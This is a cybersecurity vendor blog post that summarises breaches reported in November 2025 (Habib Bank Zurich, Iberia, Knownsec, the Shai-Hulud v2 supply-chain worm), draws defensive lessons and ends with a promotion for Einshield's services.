November 2025 Cyberstorm: The Biggest Hacks & Breaches Uncovered

One of the most turbulent months in recent cyber-security history will be November 2025. Numerous supply-chain attacks, ransomware campaigns, and high-impact data breaches have affected businesses in a variety of industries, exposing private information, confidential company documents, and even banking or government infrastructure. It was a "Cyberstorm" due to the scope, diversity, and sophistication of the attacks.

According to a recent report summarizing global 2025 breaches, November alone saw major incidents affecting healthcare providers, technology firms and large enterprises — ranging from hundreds of thousands to over a million individuals per breach.

Majorly,‍‌‍‍‌‍‌‍‍‌ the number of records involved in the breaches varied from hundreds of thousands to over a million individuals per breach.

 Major Breaches & Hacks That Shocked November 

 Habib Bank AG Zurich — 2.5 TB of Data Stolen 

On November 5, 2025, the Qilin ransomware group claimed on its dark web leak site that it had stolen about 2.5 terabytes of data (nearly two million files) from Habib Bank AG Zurich. The group also claimed that the data stolen supposedly contained passport numbers, transaction histories, account balances, internal banking tools, and KYC documents. Habib Bank AG Zurich has confirmed that there was unauthorized external access to its corporate network, but it has not publicly verified Qilin’s claims about the exact volume of data stolen. The exposure of this type of information puts affected customers at significant risk of identity theft, financial fraud, and highly targeted phishing or social‑engineering attacks, while the theft of source code could enable further attacks if adversaries identify and exploit weaknesses in the bank’s systems.

 Iberia Airline — Passenger Data Held Ransom 

The end of November came with bad news for the air travel industry. The hackers were said to have penetrated a database owned by Iberia (via a third-party supplier) and thus they had access to the data of the passengers. These data included names, emails, loyalty program numbers, etc. The Everest ransomware group took responsibility, claiming to have exfiltrated nearly 600 GB of data. The group subsequently demanded a $6 million ransom to prevent the data from being sold or publicly leaked. The airline, however, assured that no payment, financial data, or passwords have been compromised. Nevertheless, the leak makes the affected customers vulnerable to identity theft and phishing scams.

 Knownsec (Chinese Cybersecurity Firm) — Data Leak Exposing Hacking Tools & Target Lists 

It is hard to believe but the security provider itself was breached. Knownsec, which is typically associated with government cyber operations, was in early November 2025 the victim of a breach that resulted in the exposure of internal state-backed hacking tools and target lists. The leaked materials which was posted on GitHub, included over 12,000 internal documents and this provides the rare opportunity to see the potential espionage infrastructure.

The leaked files contained massive amounts of stolen data, including:

• 95 GB of Indian immigration records
• 3 TB of call logs from a South Korean telecom operator
• 459 GB of transportation and road planning data from Taiwan

Supply‑Chain Malware & Open Source Compromise — A Hidden but Widespread Threat

Besides the major breaches talked about in the headlines, November was a month of stealthy attacks through supply-chain compromises. The second wave of a well-known campaign called Shai-Hulud v2 moved beyond npm packages after compromising over 830 npm packages to Java’s Maven ecosystem - thus, by infecting repositories, the perpetrators exposed a large number of cloud credentials, API tokens, and GitHub secrets.

The malware uses a "worm-like" propagation method. It injects malicious workflows into repositories that harvest secrets and use them to infect further repositories, creating a self-sustaining cycle of compromise.

The v2 variant is stealthier than its predecessor, utilizing the Bun runtime to hide its core logic and exfiltrating data to randomly named public GitHub repositories to evade detection.

 What Went Wrong — Common Patterns behind the Chaos? 

Supply-chain & third-party risk: Many breaches resulted from indirect attacks targeting organizations through compromised vendors or software providers (e.g., third-party airline suppliers, open-source ecosystems). These extended trust networks became the primary vulnerability point.

Zero-day vulnerabilities exploited: Attackers leveraged previously undisclosed weaknesses in enterprise software to infiltrate networks, often evading detection and patching efforts.

Credential theft & malware infiltration: Infostealer malware combined with weak credential hygiene, lack of multi-factor authentication (MFA) and social engineering tactics enabled attackers to access sensitive user and corporate data with alarming ease.

Insufficient Segmentation & Outdated Systems: Organizations relying on outdated or poorly segmented systems made it easy for attackers to move laterally after initial intrusion.

Even defenders are vulnerable: The breach at Knownsec is a clear-cut example that even "defenders" are not free from the risk: a cybersecurity firm providing security services turned out to be a target - in other words, no company, no matter how security-conscious, is invulnerable.

 Why November 2025 Matters — Lessons & Wake-up Call 

Cyber risk is systemic, not individual: The breadth of these breaches - in sectors like finance, aviation, media, education, enterprise software - signals that the so-called "safe" industries are now the high-value targets.

Supply-chain hygiene is as important as endpoint security: The security measures need to be more than just local system patches, they have to include vendor audits, software 

User data remains gold for attackers: The personal data that have been exposed - names, emails, loyalty IDs, passport numbers - are highly valuable for the attackers as they can be used for identity theft, phishing, or selling on dark‑web markets.

Rapid detection and response matter: The majority of the November breaches were not detected for weeks or even months - in that time, the attackers were able to steal large volumes of data. Therefore, quicker detection, segmentation and containment are vital.

Transparency matters: It is rather unexpected that some organizations - including security firms themselves - have suffered breaches. This fact underlines the need for transparent disclosure and strict security measures in every place.

 Final Thoughts 

November 2025’s “Cyberstorm” serves as a powerful reminder that no organization—and no security vendor—is immune. The attack surface is extensive, and adversaries are becoming increasingly sophisticated, targeting everyone from global airlines and major banks to healthcare providers and open-source ecosystems.

The takeaway is unambiguous: Proactive and Comprehensive cybersecurity is indispensable. Organizations must implement layered defenses, maintain continuous monitoring, enforce zero-trust policies and be prepared to respond instantly to incidents.

A partnership with a reliable cybersecurity specialist can be very beneficial. Einshield offers full-cycle solutions designed to locate vulnerabilities, stop attacks, and respond to threats effectively. 

With Einshield, companies can protect their data, ensure operational security, and maintain resilience in the face of an ever-changing cyber landscape. Do not wait for the next Cyberstorm—strengthen your defenses now.

The Lesson from November 2025: Resilience is Non-Negotiable